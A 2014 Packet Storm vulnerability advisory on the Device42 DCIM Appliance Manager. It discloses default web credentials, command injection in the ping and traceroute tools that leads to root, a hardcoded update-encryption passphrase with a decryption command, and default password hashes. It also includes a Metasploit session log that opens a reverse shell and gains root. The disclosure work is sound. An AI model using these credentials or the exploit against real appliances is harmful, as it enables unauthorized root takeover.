Device42 Embedded Credentials

2014-11-26T00:00:00
ID PACKETSTORM:129280
Type packetstorm
Reporter Brandon Perry
Modified 2014-11-26T00:00:00

Description

                                        
                                            `Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0  
  
http://www.device42.com/download/  
  
  
  
Device42 ships virtual appliances ready for production use as a trial  
(essentially dictated by the license provided).  
  
  
The Appliance Manager listens on HTTP (no SSL) on port 4242 with default  
credentials of d42admin:default.  
  
  
Within the Appliance Manager, the Ping and Traceroute utilities are  
susceptible to command injection via bash metacharacters. The user which  
the commands get executed under is the 'ubuntu' user, but this user has  
passwordless sudo ability, so it is essentially root access. Two exploits  
are provided that exploit these vulnerabilities using the default  
credentials.  
  
  
Updates from device42 are encrypted by default to prevent users from  
creating their own updates and uploading them, but the password for the  
encrypted zip file is 'pass:zofo8REgqM' so any user could create their own  
encrypted update using this passphrase.  
  
  
openssl enc -aes-256-cbc -d -in /tmp/update.enc -out /tmp/update.zip -pass  
pass:zofo8REgqM  
  
  
Also, the root and ubuntu users have default passwords in the shadow file.  
  
  
Root –  
$6$zhdissWh$2VrhU3tncXClbuUU3dJk2ieAKF3kTPpvcT9/VKw.Yw4rl1E2eYpAYAfZUgSZvYhqVQvUqLVRp8HOsoMueKgd10  
  
  
Ubuntu –  
$6$1eU5n9o7$w4.tmNriNT1Zb5HabWwlGmnmy8ij1fKbn0UGf9raHKdIaurYVD/ZU9C2s6DBueKhVbekZCozzAoHZH43.OwDi/  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
msf exploit(device42_tracert_exec) > show options  
  
  
Module options (exploit/linux/http/device42_tracert_exec):  
  
  
Name Current Setting Required Description  
  
---- --------------- -------- -----------  
  
Proxies no Use a proxy chain  
  
RHOST 192.168.1.81 yes The target address  
  
RPORT 4242 yes The target port  
  
VHOST no HTTP server virtual host  
  
  
  
Payload options (cmd/unix/reverse):  
  
  
Name Current Setting Required Description  
  
---- --------------- -------- -----------  
  
LHOST 192.168.1.31 yes The listen address  
  
LPORT 4444 yes The listen port  
  
  
  
Exploit target:  
  
  
Id Name  
  
-- ----  
  
0 Automatic Targeting  
  
  
  
msf exploit(device42_tracert_exec) > exploit  
  
  
[*] Started reverse double handler  
  
[*] Accepted the first client connection...  
  
[*] Accepted the second client connection...  
  
[*] Command: echo YWFxSIuVtNUMShSi;  
  
[*] Writing to socket A  
  
[*] Writing to socket B  
  
[*] Reading from sockets...  
  
[*] Reading from socket A  
  
[*] A: "YWFxSIuVtNUMShSi\r\n"  
  
[*] Matching...  
  
[*] B is input...  
  
[*] Command shell session 3 opened (192.168.1.31:4444 -> 192.168.1.81:39878)  
at 2014-11-22 17:36:59 -0600  
  
  
sudo su  
  
id  
  
uid=0(root) gid=0(root) groups=0(root)  
  
exit  
  
id  
  
uid=1000(ubuntu) gid=1000(ubuntu)  
groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare)  
  
--   
http://volatile-minds.blogspot.com -- blog  
http://www.volatileminds.net -- website  
`